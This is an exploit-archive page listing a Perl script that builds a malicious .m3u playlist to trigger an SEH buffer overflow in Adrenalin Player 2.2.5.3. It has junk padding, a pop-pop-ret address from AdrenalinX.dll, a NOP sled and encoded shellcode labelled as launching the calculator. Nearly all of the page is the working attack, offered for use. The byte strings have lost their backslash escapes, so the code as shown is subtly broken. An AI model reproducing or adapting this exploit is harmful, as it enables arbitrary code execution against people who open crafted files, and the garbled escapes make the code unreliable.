[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Adrenalin Player 2.2.5.3 - Buffer Overflow Exploit (SEH)
# Published : 2013-05-13
# Author :
# Previous Title : Ophcrack 3.5.0 - Local Code Execution BOF
# Next Title : AudioCoder 0.8.22 (.m3u) - Direct Retn Buffer Overflow


# Exploit Title: Adrenalin Player 2.2.5.3 Buffer Overflow Exploit(SEH)
# http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Author: seaofglass (seaofglass@korea.com)
# Version : 2.2.5.3
# Tested on: WinXP3 KOR, Win7 KOR

my $file = "adrenalin.m3u";
my $junk = "x90" x 2172;
my $nseh = pack('V', 0x909006EB);
my $seh = pack('V', 0x1016f313); #ppr from AdrenalinX.dll
my $nop = "x90" x 16;
my $calc =
"xbax38xdcx15x77xddxc7xd9x74x24xf4x5dx33xc9" .
"xb1x33x83xc5x04x31x55x0ex03x6dxd2xf7x82x71" .
"x02x7ex6cx89xd3xe1xe4x6cxe2x33x92xe5x57x84" .
"xd0xabx5bx6fxb4x5fxefx1dx11x50x58xabx47x5f" .
"x59x1dx48x33x99x3fx34x49xcex9fx05x82x03xe1" .
"x42xfexecxb3x1bx75x5ex24x2fxcbx63x45xffx40" .
"xdbx3dx7ax96xa8xf7x85xc6x01x83xcexfex2axcb" .
"xeexffxffx0fxd2xb6x74xfbxa0x49x5dx35x48x78" .
"xa1x9ax77xb5x2cxe2xb0x71xcfx91xcax82x72xa2" .
"x08xf9xa8x27x8dx59x3ax9fx75x58xefx46xfdx56" .
"x44x0cx59x7ax5bxc1xd1x86xd0xe4x35x0fxa2xc2" .
"x91x54x70x6ax83x30xd7x93xd3x9cx88x31x9fx0e" .
"xdcx40xc2x44x23xc0x78x21x23xdax82x01x4cxeb" .
"x09xcex0bxf4xdbxabxe4xbex46x9dx6cx67x13x9c" .
"xf0x98xc9xe2x0cx1bxf8x9axeax03x89x9fxb7x83" .
"x61xedxa8x61x86x42xc8xa3xe5x05x5ax2fxc4xa0" .
"xdaxcax18";

open($FILE, ">$file");
print $FILE $junk . $nseh . $seh . $nop . $calc;
close($FILE);

print "m3u poc file created successfully.n";